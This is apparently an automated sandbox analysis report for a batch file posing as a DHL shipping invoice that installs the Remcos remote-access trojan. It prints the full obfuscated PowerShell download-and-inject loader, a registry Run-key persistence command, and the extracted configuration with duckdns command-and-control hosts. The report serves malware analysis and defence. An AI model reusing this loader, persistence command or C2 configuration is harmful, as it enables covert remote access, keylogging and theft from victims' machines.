Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 00:42
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.bat
Resource
win7-20240903-en
General
-
Target
DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.bat
-
Size
4KB
-
MD5
89671e0720226be93c2656919ad5c32a
-
SHA1
71351ff372ff8075aa021e9d352c98adedb4ea40
-
SHA256
bde5f995304e327d522291bf9886c987223a51a299b80ab62229fcc5e9d09f62
-
SHA512
5cb8bdec3293daee1ed6c67ad27421252ec55908240d8c1ff5f4a851991373180434a2e7e06d886f877a2ed04007abe009e6767348a41309c9ef04e8c5eda448
-
SSDEEP
96:FZGj89ofWhaSyluf7/z+lab9Vkt2ElG1dm1Xde3c9xA1lxvU1TN:Dg8Se4uf7alXGvm1XKc9xCXvU1x
Malware Config
Extracted
remcos
Fire$
iwarsut775laudrye2.duckdns.org:57484
iwarsut775laudrye2.duckdns.org:57483
iwarsut775laudrye3.duckdns.org:57484
hjnourt38haoust1.duckdns.org:57484
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
sfvnspt.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
shietgtst-EYGLP1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2012 powershell.exe 7 2604 msiexec.exe 9 2604 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2012 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Interpilaster = "%Chalcon% -windowstyle 1 $Tubinares=(gp -Path 'HKCU:\\Software\\Miljbeskyttelsesmsige\\').Miliaria240;%Chalcon% ($Tubinares)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2604 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2076 powershell.exe 2604 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2612 cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2008 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2012 powershell.exe 2076 powershell.exe 2076 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2612 wrote to memory of 2012 2612 cmd.exe 32 PID 2612 wrote to memory of 2012 2612 cmd.exe 32 PID 2612 wrote to memory of 2012 2612 cmd.exe 32 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2076 wrote to memory of 2604 2076 powershell.exe 37 PID 2604 wrote to memory of 2216 2604 msiexec.exe 38 PID 2604 wrote to memory of 2216 2604 msiexec.exe 38 PID 2604 wrote to memory of 2216 2604 msiexec.exe 38 PID 2604 wrote to memory of 2216 2604 msiexec.exe 38 PID 2216 wrote to memory of 2008 2216 cmd.exe 40 PID 2216 wrote to memory of 2008 2216 cmd.exe 40 PID 2216 wrote to memory of 2008 2216 cmd.exe 40 PID 2216 wrote to memory of 2008 2216 cmd.exe 40
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.bat"1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#functionation Nonascendant Civilkonomers Hindringerne holcad initialer Pacificatory #>;$Guvernanter='Pertentlig';<#udenrigsredaktrer schopenhauerism Kapitalstrke Paradigme #>;$Archplayer=$spasmers+$host.UI;function Belurings($Dimmed){If ($Archplayer) {$Forsagende++;}$Vandalsk=$Rensningsanlg+$Dimmed.'Length'-$Forsagende; for( $Phenylglyoxylic=2;$Phenylglyoxylic -lt $Vandalsk;$Phenylglyoxylic+=3){$Sknhedssvns++;$Abolishes27+=$Dimmed[$Phenylglyoxylic];$Pachydermatosis176='Egesborgs';}$Abolishes27;}function pensionr($Skaberaktapirs){ & ($Cinderman) ($Skaberaktapirs);}$Projektbeskrivelse34=Belurings ' M eo z,niCrlGalNoaPl/R. ';$Projektbeskrivelse34+=Belurings ' l5,n.Sg0No Se( lWStiBenUrd.roSew Ls,g R N nTTu St1 u0 H.sk0 k;Sl T WDoiDin 6Va4 e;Fi x,t6I 4 a;Ba E rFov o:Ch1Re3 o1 r. U0No)Ch T GTre ,c rk ao ./Sl2bi0Pl1 g0 ,0Ab1.c0ty1 . AFOviGrrBee.if Do FxDe/U.1G 3.o1 o.Ci0S ';$Songoi=Belurings 'ReuOusSteFeRTi-Tra,ugMeeRenKoTIc ';$Maskefang=Belurings ' thTatMutClp nsTr:Ha/Lu/ Tb a2IncEmaRas ee o.Blc eoB.m /TaSv u trdee 2 U. BpEnn,egBi>A,hKrtKyt fp .sM : o/ a/ abte2.oc iaA.sD eSaoN,nB eMi. Ac roInm /FaSspuC r.ce N2 u. pO,n Sg.i ';$Trekornsbrdenes=Belurings ' u>Ud ';$Cinderman=Belurings 'M iHuE AXBl ';$Brodie='Solbrmarmelades';$Sullow210='\Noncommemorative.Ela';pensionr (Belurings 'Sa$B GdiLAnoCub Ga.olR.:R p oO ACK KN Esht sfHou l =Br$ se aN TVIc:E APip AP ndU A CTS ATo+ H$K.s uuSsL AlUnoTiW T2Mi1 L0 T ');pensionr (Belurings 'Ka$ .gBeLO o .bNaADel e: dBroTonGrO irP.= P$bsm BA rS Dk MERoF iADiNTrGA..,eSKapBel TiA,t,r( .$ pt .r AEdyK,no cR ENDoS .b RbeDGeEGlnSmE Bsm.)Ex ');pensionr (Belurings 'Ci[ScN HETeTB .G sFye rr V CI ScKue .ppaOTeITrNhaTUdmE.aDoN SAB,G Ae PRP ]Ub:Kn:SlsLiEArcFluVaR .iPat KY tp TRVio StKao MCSeoBrlRa Ud=ta [TaNMieMatpo. UsA eUdCPauIgR.aI STHoy.aPH.R JOB.tC.OUaCMaONdLUntCiycepB EF,] h:Th:brT ilF S 1S 2 R ');$Maskefang=$Donor[0];$Trevrelseslejligheders=(Belurings ' l$ ug ,LKrO b HARel D: DBPra TBArY Aeovn,e= FnTaE Gwp.-a o BToj.oEvaCWot o FrsV,y ,sP T E fM m. nNArEInT.o.OrW,rESuBDuc RlLai DeMiNS tSp ');pensionr ($Trevrelseslejligheders);pensionr (Belurings 'V $ SB gaCob uy SeLyn F.apHVee aSidPheSar Rs a[ R$ uSCho unDigB,oB.iAf] B=Ak$TrP rPooOrjO eD,kAftKrb ee isSakk,rslifavD,e,el ts,ae T3 e4Tu ');$Varlet=Belurings 'Sk$ BScaBabS yPhe CnTo.A DMeoCowBonDol oRea ,dCaFSaiO lE eK,(Ka$PaMDeaOfs.mkU eA.fViaQunA g K, $E N eUngP rS oD.pBihpni lXai ysDet U)Ba ';$Negrophilist=$Pocketful;pensionr (Belurings ' $SlG,ulSnORibP ADelSu:K BJ.eH,cS.KUnedaDC.=.u(GrtBreTiS QtEl-ChpT aN TH.H,e P,$UbnFieTrGK REnoY pB h Ci LC I Ss ,TMa)St ');while (!$Becked) {pensionr (Belurings ' o$ Wg PlHooEnbA.a glNe:m CC rFuiWasTesToc,lrStoDes sTae esPe=Ko$ ntUnr au BeGr ') ;pensionr $Varlet;pensionr (Belurings 'HosOvT cA rRUdt j-Ams,elDee tE EPDa a4 T ');pensionr (Belurings 'Kr$ eg Hl BOBoB .a,nLHy: BCiE dCT,KDreUndUn=Fo( T PeSuSArT .-S P SALetK HPa $T,nTrE,dGBarDaoSvpFiH UI ml Ai aSTatVa)B ') ;pensionr (Belurings ' $.egKalVaOAkbmiAC.LPa:TaE,udM eSqMUlaSqtAsaMi=Mo$.yGBelI OInBMuASpl p:DapSkrNeeGrc,raBaNSaC TEUrLKoLBeEDed S+Pa+K %.n$GrdHjO,oNBao.nR I.Ovc doVaU on nt ') ;$Maskefang=$Donor[$Edemata];}$Despotismes=329108;$succesrigt=26476;pensionr (Belurings 'Fu$SaG nLbio .b TARel v:F.H FiBrnTidT e en DsBo M =St CG oEret l- LCSkoDanf tBoe TN Vt l Mi$UnnFee GgUnRPaO hpArh.nIC.L.lIReSNatCl ');pensionr (Belurings 'T.$S g llH.o tb ia .l ,: aPAkiUbn gSpe .r S Fl=P P [WoSFayKosPrt escm . UC no,vn OvP,ecyrKutUn] R:Sk: TFDerJ oK mFaB NauasNoeVr6Sc4O.SArtOcrdiiN n Eg u(B $GrH Ri ongyd ,eK n es E)Di ');pensionr (Belurings 'B.$reG ll oO DBT,aB lPr:B a ORBaBUnEudjFodO EKnrP M uK SP eN ET tPh Rb=St Ed[ Es YAzSS,TFeEAuM .inTToejaXViTBl.A E DnT.cKaoR DBuiM nFigHo] G:S :BrAabsF,cl ivaIB .S,gEtEReTMisStTS RJoiS,n GBe(Kr$InpCiicunRogBreUnRLi) R ');pensionr (Belurings 'De$M.G ILRvo,nbS a Bl k:MoTD oSuNV eRafIniO lFom lgOvEhunseG .IF vstEBeRLy=T.$ SAYpR .b e rjAkdSaEToRPrmK,U IsAreC ETetBe.,usCou,eBFosZetV RVaI RNReGAf(Hm$DiDAuE.nsBaPDiO,atKniR,sT MD,ETos,o,Pa$UnsS.U FC ,CMaeTrSBirMuIRaGgat d)R ');pensionr $Tonefilmgengiver;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#functionation Nonascendant Civilkonomers Hindringerne holcad initialer Pacificatory #>;$Guvernanter='Pertentlig';<#udenrigsredaktrer schopenhauerism Kapitalstrke Paradigme #>;$Archplayer=$spasmers+$host.UI;function Belurings($Dimmed){If ($Archplayer) {$Forsagende++;}$Vandalsk=$Rensningsanlg+$Dimmed.'Length'-$Forsagende; for( $Phenylglyoxylic=2;$Phenylglyoxylic -lt $Vandalsk;$Phenylglyoxylic+=3){$Sknhedssvns++;$Abolishes27+=$Dimmed[$Phenylglyoxylic];$Pachydermatosis176='Egesborgs';}$Abolishes27;}function pensionr($Skaberaktapirs){ & ($Cinderman) ($Skaberaktapirs);}$Projektbeskrivelse34=Belurings ' M eo z,niCrlGalNoaPl/R. ';$Projektbeskrivelse34+=Belurings ' l5,n.Sg0No Se( lWStiBenUrd.roSew Ls,g R N nTTu St1 u0 H.sk0 k;Sl T WDoiDin 6Va4 e;Fi x,t6I 4 a;Ba E rFov o:Ch1Re3 o1 r. U0No)Ch T GTre ,c rk ao ./Sl2bi0Pl1 g0 ,0Ab1.c0ty1 . AFOviGrrBee.if Do FxDe/U.1G 3.o1 o.Ci0S ';$Songoi=Belurings 'ReuOusSteFeRTi-Tra,ugMeeRenKoTIc ';$Maskefang=Belurings ' thTatMutClp nsTr:Ha/Lu/ Tb a2IncEmaRas ee o.Blc eoB.m /TaSv u trdee 2 U. BpEnn,egBi>A,hKrtKyt fp .sM : o/ a/ abte2.oc iaA.sD eSaoN,nB eMi. Ac roInm /FaSspuC r.ce N2 u. pO,n Sg.i ';$Trekornsbrdenes=Belurings ' u>Ud ';$Cinderman=Belurings 'M iHuE AXBl ';$Brodie='Solbrmarmelades';$Sullow210='\Noncommemorative.Ela';pensionr (Belurings 'Sa$B GdiLAnoCub Ga.olR.:R p oO ACK KN Esht sfHou l =Br$ se aN TVIc:E APip AP ndU A CTS ATo+ H$K.s uuSsL AlUnoTiW T2Mi1 L0 T ');pensionr (Belurings 'Ka$ .gBeLO o .bNaADel e: dBroTonGrO irP.= P$bsm BA rS Dk MERoF iADiNTrGA..,eSKapBel TiA,t,r( .$ pt .r AEdyK,no cR ENDoS .b RbeDGeEGlnSmE Bsm.)Ex ');pensionr (Belurings 'Ci[ScN HETeTB .G sFye rr V CI ScKue .ppaOTeITrNhaTUdmE.aDoN SAB,G Ae PRP ]Ub:Kn:SlsLiEArcFluVaR .iPat KY tp TRVio StKao MCSeoBrlRa Ud=ta [TaNMieMatpo. UsA eUdCPauIgR.aI STHoy.aPH.R JOB.tC.OUaCMaONdLUntCiycepB EF,] h:Th:brT ilF S 1S 2 R ');$Maskefang=$Donor[0];$Trevrelseslejligheders=(Belurings ' l$ ug ,LKrO b HARel D: DBPra TBArY Aeovn,e= FnTaE Gwp.-a o BToj.oEvaCWot o FrsV,y ,sP T E fM m. nNArEInT.o.OrW,rESuBDuc RlLai DeMiNS tSp ');pensionr ($Trevrelseslejligheders);pensionr (Belurings 'V $ SB gaCob uy SeLyn F.apHVee aSidPheSar Rs a[ R$ uSCho unDigB,oB.iAf] B=Ak$TrP rPooOrjO eD,kAftKrb ee isSakk,rslifavD,e,el ts,ae T3 e4Tu ');$Varlet=Belurings 'Sk$ BScaBabS yPhe CnTo.A DMeoCowBonDol oRea ,dCaFSaiO lE eK,(Ka$PaMDeaOfs.mkU eA.fViaQunA g K, $E N eUngP rS oD.pBihpni lXai ysDet U)Ba ';$Negrophilist=$Pocketful;pensionr (Belurings ' $SlG,ulSnORibP ADelSu:K BJ.eH,cS.KUnedaDC.=.u(GrtBreTiS QtEl-ChpT aN TH.H,e P,$UbnFieTrGK REnoY pB h Ci LC I Ss ,TMa)St ');while (!$Becked) {pensionr (Belurings ' o$ Wg PlHooEnbA.a glNe:m CC rFuiWasTesToc,lrStoDes sTae esPe=Ko$ ntUnr au BeGr ') ;pensionr $Varlet;pensionr (Belurings 'HosOvT cA rRUdt j-Ams,elDee tE EPDa a4 T ');pensionr (Belurings 'Kr$ eg Hl BOBoB .a,nLHy: BCiE dCT,KDreUndUn=Fo( T PeSuSArT .-S P SALetK HPa $T,nTrE,dGBarDaoSvpFiH UI ml Ai aSTatVa)B ') ;pensionr (Belurings ' $.egKalVaOAkbmiAC.LPa:TaE,udM eSqMUlaSqtAsaMi=Mo$.yGBelI OInBMuASpl p:DapSkrNeeGrc,raBaNSaC TEUrLKoLBeEDed S+Pa+K %.n$GrdHjO,oNBao.nR I.Ovc doVaU on nt ') ;$Maskefang=$Donor[$Edemata];}$Despotismes=329108;$succesrigt=26476;pensionr (Belurings 'Fu$SaG nLbio .b TARel v:F.H FiBrnTidT e en DsBo M =St CG oEret l- LCSkoDanf tBoe TN Vt l Mi$UnnFee GgUnRPaO hpArh.nIC.L.lIReSNatCl ');pensionr (Belurings 'T.$S g llH.o tb ia .l ,: aPAkiUbn gSpe .r S Fl=P P [WoSFayKosPrt escm . UC no,vn OvP,ecyrKutUn] R:Sk: TFDerJ oK mFaB NauasNoeVr6Sc4O.SArtOcrdiiN n Eg u(B $GrH Ri ongyd ,eK n es E)Di ');pensionr (Belurings 'B.$reG ll oO DBT,aB lPr:B a ORBaBUnEudjFodO EKnrP M uK SP eN ET tPh Rb=St Ed[ Es YAzSS,TFeEAuM .inTToejaXViTBl.A E DnT.cKaoR DBuiM nFigHo] G:S :BrAabsF,cl ivaIB .S,gEtEReTMisStTS RJoiS,n GBe(Kr$InpCiicunRogBreUnRLi) R ');pensionr (Belurings 'De$M.G ILRvo,nbS a Bl k:MoTD oSuNV eRafIniO lFom lgOvEhunseG .IF vstEBeRLy=T.$ SAYpR .b e rjAkdSaEToRPrmK,U IsAreC ETetBe.,usCou,eBFosZetV RVaI RNReGAf(Hm$DiDAuE.nsBaPDiO,atKniR,sT MD,ETos,o,Pa$UnsS.U FC ,CMaeTrSBirMuIRaGgat d)R ');pensionr $Tonefilmgengiver;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Interpilaster" /t REG_EXPAND_SZ /d "%Chalcon% -windowstyle 1 $Tubinares=(gp -Path 'HKCU:\Software\Miljbeskyttelsesmsige\').Miliaria240;%Chalcon% ($Tubinares)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Interpilaster" /t REG_EXPAND_SZ /d "%Chalcon% -windowstyle 1 $Tubinares=(gp -Path 'HKCU:\Software\Miljbeskyttelsesmsige\').Miliaria240;%Chalcon% ($Tubinares)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2008
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8KMLXRTSU69DXCUCRRIQ.temp
Filesize7KB
MD526cce2019dbe6096008fb886360d466d
SHA1b04f02c3d0023cefb072c6e88a97f442a30e620d
SHA256b57022d4ed214c7e234c89ff81da492379557944c47892d92396ac6acb6e40ee
SHA51209be9f7f91991c16923b5cc6d8245db19fccaba975bd1192f6130e596b81167fdf7f3e6d426b56ba80d604676705bbd079c69ef37cf337b0fb939aa50a2df3dc
-
Filesize
463KB
MD51329107cb8ff5ddf32bae433ea9e8d28
SHA1a857bb30fe9ccfd9d7596fb7080c3ec87ec61a2f
SHA25625a4a2f9466d57da786e2b62aa326d629e79b90e06d50f7259221e7d027ff035
SHA5121971022ebeaebb60f78a642641a3fdf9609d1c30b1ff0af128ec5ba11a8a69d61dc1f7c2c9a3633d682de285eacb5a1f95a5dc7f4778c9c9246ceb524b6a5245